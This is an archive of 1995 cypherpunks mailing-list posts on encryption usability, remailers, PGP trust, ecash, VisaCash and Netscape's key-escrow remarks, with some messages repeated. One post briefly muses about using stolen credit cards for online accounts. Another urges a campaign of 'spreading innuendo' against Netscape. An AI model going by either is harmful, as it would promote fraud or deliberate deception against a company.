<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   18:18
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLzqZ4dTfgZXlXydAQFxQgf9HY6aE53ZURtH10XrHlRggYrwK88WXtxf
GmF1Vq8Gs7kwf3E71e8hDKCMJ6BDMTded2oYZjx1gmBMImxSczTX721IzbXttAKx
H5Nm/hMAV85DdJhxexENY5Do9naf68YAklcloVr3UdTHI+KMeIbTKQdWp//s89Rx
E02ohxyHIS/ckDRo89AMzVZWYv9dpP1Ua9VKAWM0uARtCITTDfM3ZvxRE7P7FYky
xpnSHP2dobWWNIOl/4CUFmbYoOgi0nkWrEslisKJ67H/oL+8rkdts3qaKqIa/feV
gqplKYmDB97diEjjuQCbqYUqGuwnSudrcpUnV4E9DkVOFALgdRC/aA==
=9xHp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Wed, 29 Nov 1995 22:30:19 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: The future will be easy to use
Message-ID: <01HY7L3OU4XE922UYW@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: Jack P. Starrantino      \ Internet:    (jps@monad.semcor.com)

JS> I bring nothing cypher-wise. I would be willing to help walk the
JS> s/w-engineering dog and to write Motif/X/socket if the chosen platform
JS> is UN*X, however.

JS> So, from an engineering standpoint, what should the "future" look
JS> like?

unfortunately, it appears to me that if you _really_ want encryption
to be universal, it's gotta be done on windoze, it's gotta be
point-n-click and seamless to the mail application. i would prefer it
if the masses would use a real operating system, (no o/s wars please.
i started in a mini/mainframe environment and simply don't think
dos/windoze qualify your mileage may vary), but that just ain't the
way it is. would netscape be selling at $130+ if they only wrote for
unix?

my 2 cents


amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 29, 1995   17:40
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLzhU4dTfgZXlXydAQEC1gf+ImAvGk2ceQqCt8E0EC9rlFwrMgEmgkZk
E+mBd88dB8TazZn1n7oXasjc0GIjMZZCQYft9gqzuQDLQ6ceK5MpIZuREFWJq6+U
nyvq/ivkiGwB4ubZ48xG4EJS8094C+Xj4fG/zgtNVsQr0O6ln/6Q/+bt/ciqP9PZ
4gjP4VYpmiFEQ3OGW/oYevmAxdvYYRoWEfjUwmG8tHKORWo9yfDs9yJHHYo3StmX
SqM47v2F3D1r5JBgdrrIdOElwJHchU31kwk7trDs0/Ne7HWDdgIsX2MoDCW/Dwdt
SaTC3B5TVpz6G/+FvxUSRWgY5vU1sqnCT5WogqTfJRP5ohz5rt6nqQ==
=IB4/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 30 Nov 1995 22:41:40 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <v02120d45ace367e370bd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:27 AM 11/30/95, Timothy C. May wrote:
<snip>
>My intuition (hand-waving) is that an anonymous lottery is possible, but I
>haven't looked at the details. Certainly multiple trusted holders of keys
>(escrow agents) would help make the lottery fair. Maybe bit commitment
>would help (each player buys the right to play, then "commits" his number.
>A public reading of the winning number occurs, and the winner can reveal
>his winning number (anonymously if he wishes, providing he had registered
>his hash....).

My bet it would work a lot like anonymous voting schemes would, though I
don't know how. It just feels like the same kind of thing...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 22:40:49 +0800
To: cypherpunks@toad.com
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To: <96oDFD11w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9511300805.B35014-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Dr. Dimitri Vulis wrote:

> futplex@pseudonym.com (Futplex) writes:
> > People who steal credit cards prefer to order goods to be delivered somewhere
> > they can grab them.
> 
> For most goods, yes. But one could use a stolen credit card, e.g., to set
> up an account on AOL / CompuServe and download tons of software, charging
> it to the card.
> 

<Flamebait>
Or c2.org, which might then make things interesting if the theft is detected.
(in a very perverse, and tooth-gnashingly aggravating way, of course).
Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
his service"? 

What if it's an ecash password getting stolen? Who's liable? (lemme 
guess, your money's gone, tough luck!) What if you're just a dumb 
gullible computer newbie who trusts ecash for its vaunted security? 
"But how was I supposed to know that if I let someone surf my 
shoulder, I'd lose my bank account!?" I'd say buyer beware! but he'd 
sue and the public will want a law ("Damn it, consumers have to be 
PROTECTED!").
Credit only has $50 worth of risk, most people are more interested in 
keeping their $ than their privacy. Just look at the number of them who 
enter contests.
</Flamebait>

Disclaimer: I don't have a marktwain account at the moment, so I can't
say a thing about the security of the system. I wish them the absolute best of 
luck.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 02:12:57 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511301739.JAA13160@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, Raph Levien wrote:

> Groups of remailers sharing a machine or operator:
> (robo syrinx c2)
> (flame hacktic replay)
> (alumni portal)

Anything more specific on the above info? 

  robo, syrinx, c2 all running on c2.org
  alumni, portal run by Hal Finney
  hacktic, replay run on xs4all / by Alex de Joode?

ok so far, but flame is xs4all/de Joode as well?

flame used to be:

  Slovenian Anonymous Remailer <remailer@flame.sinet.org>

Does the fact that it is now listed along with hacktic and replay now
imply that it is no longer / never was in Slovenia?

The reason for asking is that jurisdictions are interesting properties
for remailers.  The more jurisdictions available the better the legal
morass can be created by remailing through 101 different jurisdictions.

Speaking of which, these new additions:

  ford <remailer@bi-node.zerberus.de>
  ecafe <cpunk@remail.ecafe.org>

are welcome aditions both being in Europe (Germany, and UK respectively)

Any other European/Australasian cypherpunks care to add a remailer in
their jurisdiction?

Alice de 'nonymous ...

[just giving the acquired nym a work out, and I wanted to ask the Q
anyway, so I thought I may as well flesh this Nym out, and give it a
better rep than the impostor who refuses to sign posts :-) Again,
anything that isn't signed isn't from me.]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3jzIbu8OQjKS7RAQFIQQP/ShGx18pfAT0TZcsAaY0T/LRuaXkE+C+k
9lL6mXo/FY1bHDXFUsNkb4wjJx6RujyMRWL6eI7T/ph531CY2wYaBzVdMXHjPy8m
kCMSZai08WlLJboe06tlZCGHvpDEqGPATZd1VZoulFSD1F9Ughhidspvp9/jqIR8
q/cZbGkWSrY=
=vvNf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Fri, 1 Dec 1995 15:32:58 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: key for Alice as promised (not)
Message-ID: <199512010334.UAA07818@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.
>
>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.
>
>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link.  The weak link is the 
>physical security of the system which Alice claims to use.
>
>Jon
>------------------------------------------------------------------------------
>Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
>          Visit my home page at http://www.goucher.edu/~jlasser/
>  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
>
>

I guess I missed Alice's point, but I gave it more thought and Alice is
still wrong:

1) If someone DID monitor Alice, that almost defanitly means the remailer
chain was compromised. The weakest link here is the remailer chain, not
Alice's computer's physical security.*  If Alice's true address is not
known, there cannot be any monitoring of his/her computer (unless it for
some other reason than "Alice").

2) This whole deal is about Alice signing his/her messages, not encrypting
them.  What Alice would be giving up if his/her computer were compromised
would not be security, but identity. The most Alice could lose, IF the
remailer chain were compromised and IF his/her computer's physical security
were compromised is his/her's reputation by spoofing (loss of
pseudo-anonaminity is a given if the attacker gets that far).  Those are
some really big Ifs.

*BTW, the chain is NOT as strong as it's weakest link.  If I send mail to a
remailer, and it strips the headers like it's supposed to, but sends the
mail to a compromised remailer (the weak link), I am just as secure as before. 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:11:04 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511300849.JAA13845@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 17:20:40 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511300850.JAA13876@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11/30/95 3:07 AM, Futplex quoted:

>> http://www.cnet.com/Central/News/govt.html
 ...
>---------------------------------------------
 ...
> said Clark. He added that an invincible security system for the Net is 
> possible, but such a system won't be built unless the government has a stake 
> in it. "That's where key escrow comes in," said Clark. 
>---------------------------------------------

      "A stake in its heart," more like.

Futplex then wrote:

 ...
>Netscape's web pages. I hope they will at least have the courage to put out a
>"We Support Clipper II" press release. Now the question is, how much of a
>role does Netscape Communications intend to play in implementing GAK, and
>what can we do to counter it ?

      Well, spamming the sign won't do.

      Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
sense: if Perry or someone would vet a hacked copy, I'd use it in a
second. But hacking it would involve a violation of the license, so hacked
versions couldn't be offered in any above-ground way: there'd be no way to
certify a hacked copy with a trusted nym's key.
      Netscape is between a rock and a hard place: I think it's safe to
say that, were all things equal, NS would support strong crypto. The fact
that NS has decided otherwise suggests that some pressure was applied:
Clark says as much. This leads me to believe that one possibly effective
(and possibly dangerous) tactic might lie in a seriously sustained attack
on NS's reputation -- keeping up a meme-drumbeat of "you can't trust
Netscape, that's all, you'll get ripped off." I think we should try it --
TODAY, now, persistently and loudly, until NS comes around. I'm not saying
that this'll be enough, but it's a start. TODAY. And I really don't care
what it takes: calling cronies in the press, spreading innuendo, redoing
NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the
N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do
it.


Hieronymous
FB DD B5 C8 FB F4 52 41  F0 0F A0 6E 99 43 75 06
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB
RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw==
=0FmD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 30 Nov 1995 23:28:42 +0800
To: Patiwat Panurach <pati@ipied.tu.ac.th>
Subject: Re: VisaCash security.
In-Reply-To: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>
Message-ID: <9511301505.AA04420@outland>
MIME-Version: 1.0
Content-Type: text/plain



	I think the Visa stuff is basically stored value and 
rechargeable smart cards, not really ecash type money.  Supposedly
you'll be able to get a card with $10 or $20 on it and all the
vending machines and phones around the Olympic venues will be set
up to take the cards.  So to answer your questions, no it's not really
digital cash (like ecash); and yes I think it's probably traceable
to some extent (unless you buy stored value cards w/paper cash).

	First Union, the bank selling the cards, has a page on them:

http://www.firstunion.com/visacash/

	Low on the technical info, but they give an address to mail
questions to.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 23:55:30 +0800
To: rsalz@osf.org
Subject: Re: The future will be easy to use
In-Reply-To: <199511292049.MAA01411@comsec.com>
Message-ID: <9511301511.AA27694@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: Rich Salz <rsalz@osf.org>
>Date: Wed, 29 Nov 1995 08:54:33 -0500



>Bingo!  This is one of the hard parts of certificate authorities; just
>what are you attesting to?  The American Bar Association has a big document
>for public review that addresses what this might mean; there are a couple
>of RFC's that specify CA policies (one from COST in Sweden, I think), and
>RSA and/or Verisign will give you their policy in hardcopy.
>
>In x.509v3 certificates, there is an extensible field where the key-signer
>can put arbitrary data.  The intent is apparently that you put the ISO
>object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
>document.

Ah, yes.  Here's another example of the problem with ASN.1.  That field
could equivalently be just a URL for the policy document (or, if short
enough, the policy itself).  However, ASN.1 seduced folks into indirecting
this through some object ID -- bringing all these documents into the one
master hierarchy of things in the world.

Some people just like hierarchies, I guess. :)

>There is, of course, no way to interpret the semantics of this electronically.

Of course not.  In the end, a human needs to make the decision based on
ASCII text.

>It will be interesting to see how various companies address this issue,
>for example as they start to support arbitrary CA's in browsers or servers
>while doing commerce over the web.

Yup.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3JY1QXJENzYr45AQHWIwP/VzoZuonIoMbIYHaA+noZpwnmNnxXc+jx
elJNQkHglyE7U1pBfC90s8IewujeG5T97v5g5e9bAXi/gysIPoguAXYSdIufvjz+
+WpCDrxn4UlfRzfOrTOgpZ1KQwPUllywOo1Yehd2h35ctJ8P7sa27mS/AEyET85E
rUvKlVpN/04=
=EhTO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 23:43:58 +0800
To: Pete Loshin <pete@loshin.com>
Subject: Re: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
In-Reply-To: <01BABEAC.2E90BDC0@ploshin.tiac.net>
Message-ID: <199511301513.KAA05983@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Pete Loshin writes:
> I was simply observing that Perry's comment:
> 
> "...an internetworking protocol [e.g. SKIP] used by only 
> one vendor gets nowhere."
> 
> is not necessarily true, and pointed to SSL and NFS as 
> counter-examples.

I disagree.

First of all, NFS was not competing with other widely available
standards.

Second of all, other vendors are committed to developing the other
standard.

What good will it be to run SKIP when your Cisco router wants to talk
to you with something else?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 23:53:32 +0800
To: cypherpunks@toad.com
Subject: Re: Your faith is PGP is charming and quaint, but wrong
In-Reply-To: <199511300446.UAA19851@infinity.c2.org>
Message-ID: <199511301515.KAA05995@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hroller Anonymous Remailer writes:
> 
> All of these articles from people claiming to be me!
> 
> I repeat, for the slow learners, that I consider PGP to be
> untrustworthy, at least on my machines. I don't want those Mounties
> to do to me what they did to Mulroney en passant.

How do we know that you are you? We have no evidence.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Coates <opsan@gnn.com>
Date: Fri, 1 Dec 1995 03:21:07 +0800
To: cypherpunks@toad.com"@mail-e1a.gnn.com
Subject: Re: cypherpunks at ietf
Message-ID: <199511301820.NAA06599@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee:  Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarass himself.  Don't they have karaoke 
bars for that sort of thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Coates <opsan@gnn.com>
Date: Fri, 1 Dec 1995 03:26:38 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks at ietf
Message-ID: <199511301821.NAA17770@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


>> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
> ACCURATE
>> SEARCH ON THE WEB.
>>
>> [...]
>>
>> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE
> WEB,
>> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.
>
>Gee:  Someone who has not learnt to use the caps key on his computer
>cannot do accurate searches, so will everyone else please get off
>the net.
>
>>
>> [...]
>>
>> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
>> PLACING ON THE WEB.
>
>Pleasant comic relief.
>

My guess is; he simply wanted to embarass himself.  Don't they have karaoke 
bars for that sort of thing?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 00:09:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300807.DAA12251@opine.cs.umass.edu>
Message-ID: <199511301533.KAA17468@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > http://www.cnet.com/Central/News/govt.html
| 
|    To secure Net communications, the government will need to have access to
|  private data exchanges using what is known as a key escrow security system,
|  said Clark. He added that an invincible security system for the Net is 
|  possible, but such a system won't be built unless the government
| has a stake in it. "That's where key escrow comes in," said Clark. 

	(Assuming this means Netscape intends to build-in key escrow,
not lobby for it...)

	How does Netscape intend to address the liability issues if
the key database is stolen and their *voluntary* actions lead to my
private communications being exposed?

Adam

(Jeff, if you could pass this on to the powers that escrow, I'd
appriciate it.  I know you're here on behalf of you, but...)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 1 Dec 1995 00:26:02 +0800
To: cypherpunks@toad.com
Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <Pine.3.89.9511301034.B32713-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. Co-oping with the feds will help Netscape get to 
> the commercial market sooner, and most customers, sadly don't give a damn 
> about privacy (or don't understand).

<Rant mode on>
Clipper and family are vampires; shine some light on them and they're dead.
Witness the public ridicule of the FBI 1% scheme. Compare that to the near
mainstream silence about DT. The last round of Clipper was wonderful, for 
a while in '94 we had Time sounding like Brock Meeks.

If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
Denning and takes his show on the road (sorry Jeff). This is simply 
easy fodder for journalists without a story, totally black and white 
cheap shot at the gov. While people don't give a damn about their privacy, 
they sure do get mad when they're shown how easy it is to take away. 
They *hate* hearing the $ cost.

Maybe some of the people on this list with higher profiles than myself should
start defending Clipper and GAK as loudly and stupidly as possible. I've 
grown dead tired of trying to get anyone around me interested in pgp,
remailers and whatnot. Reverse psycho sounds a lot easier:

"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
dollar investment in your national security. Only through complete wiretapping 
will we save our nation's children from violent cigarette smokers, tax 
cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
jaywalkers on the infohighway." -USA Today" 

(Apologies. You may now killfile me with a clear conscience.)

If you can't beat 'em, subvert 'em.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 18:17:39 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography Questions
Message-ID: <199511301008.LAA15993@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of alogrithms
       for any specific alogrithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? Its probably cheaper that way.

3. How does one cryptoanalyize a Feistel Network? Is there a general
   method?

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of miniutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 1 Dec 1995 00:31:30 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <9511301611.AA00257@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff wrote:
> sameer wrote:
> > http://www.cnet.com/Central/News/govt.html
> >         Bad. Very Bad. And I was almost starting to like Netscape.
>   Please don't give up on us yet. 
[...]
> PS - you won't find a LEF(sic)  in the soon to be released SSL Version 3 spec...
> Jeff Weinstein - Electronic Munitions Specialist

I've been trying to figure out the boundary conditions of the speech - what's the best 
and worst interpretations that can be placed upon it. I was not at the show.

Worst: Netscape will put GAK into every server and browser it sells or distributes.

Best: Out of context, misinterpreted quote, referring to the Fortezza support in the 
newest version of SSL. 

Fortezza (and the earlier, related Tessera) are PCMCIA cards with Clipper chips.
Clipper, as we know, *is* escrowed.

There's a lot of interest within the USG for using Web-based technologies for 
distributing information, some of it confidential. With a Fortezza-based laptop and
a Fortezza-enabled browser, a government employee  would be able to securely obtain 
text and graphics info while out in the field - for example, a social worker looking up
case histories while at a client's home, to choose a fairly uncontroversial example.

At a W3C meeting a few months ago, some NSA employees demoed a Tessera 
enabled Mosaic client and server. 

Netscape (and other SW companies) would like to sell to the USG - it's a big market.
Adding support for USG supported security systems expands that potential market.


Jeff, this does not let you or Netscape off of the hook. A *lot* of people are wondering 
just exactly what Jim was alluding to,. and would like to see a full, in-context quote.


speaking only for myself (whatever that is worth :-)

	Peter Trei
	trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Fri, 1 Dec 1995 00:52:01 +0800
To: cypherpunks@toad.com
Subject: cypherpunks at ietf
Message-ID: <951130112515.44600c48@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  I thought the following mail might be of interest. It's not my doing.

                    Bob
=========================================================================

From:	SMTP%"MEYERUSA@aol.com" 30-NOV-1995 10:25:39.59
To:	BRUEN
CC:	
Subj:	Re: DISCUSSION FOR IETF DALLAS

Date: Thu, 30 Nov 1995 08:49:15 -0500
Sender:ietf-request@IETF.CNRI.Reston.VA.US
From: MEYERUSA@aol.com
Message-ID: <951130084914_120843907@mail06.mail.aol.com>
To: rgm3@is.chrysler.com
cc: ietf@CNRI.Reston.VA.US, SteveCase@aol.com
Subject: Re: DISCUSSION FOR IETF DALLAS

THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.

THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:

          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
          4. DOWLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
          5. HOOK ON-LINE TO VIDEO & AUDIO 

THE WWW AND THE ON-LINE SERVICES MUST BE ABLE TO DIAL OUT TO THE CONSUMER
ALSO.

OUR BIGGEST FUTURE PROBLEM IS THAT WE CAN NOT LET BILL GATES, NOR THE
TELEPHONE COMPANIES, NOR THE CABLE TV COMPANIES, NOR THE MADISON AVENUE
ADVERTISING AGENCIES GET CONTROL OF THE WWW.

OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
SEARCH ON THE WEB.

COMPANIES MUST BE ABLE TO PROTECT THEIR TRADEMARKS AND SERVICE MARKS, AND TO
EMBED EVERY POSSIBLE KEYWORD IN THEIR SITE SO THAT IN THE FUTURE A CONSUMER
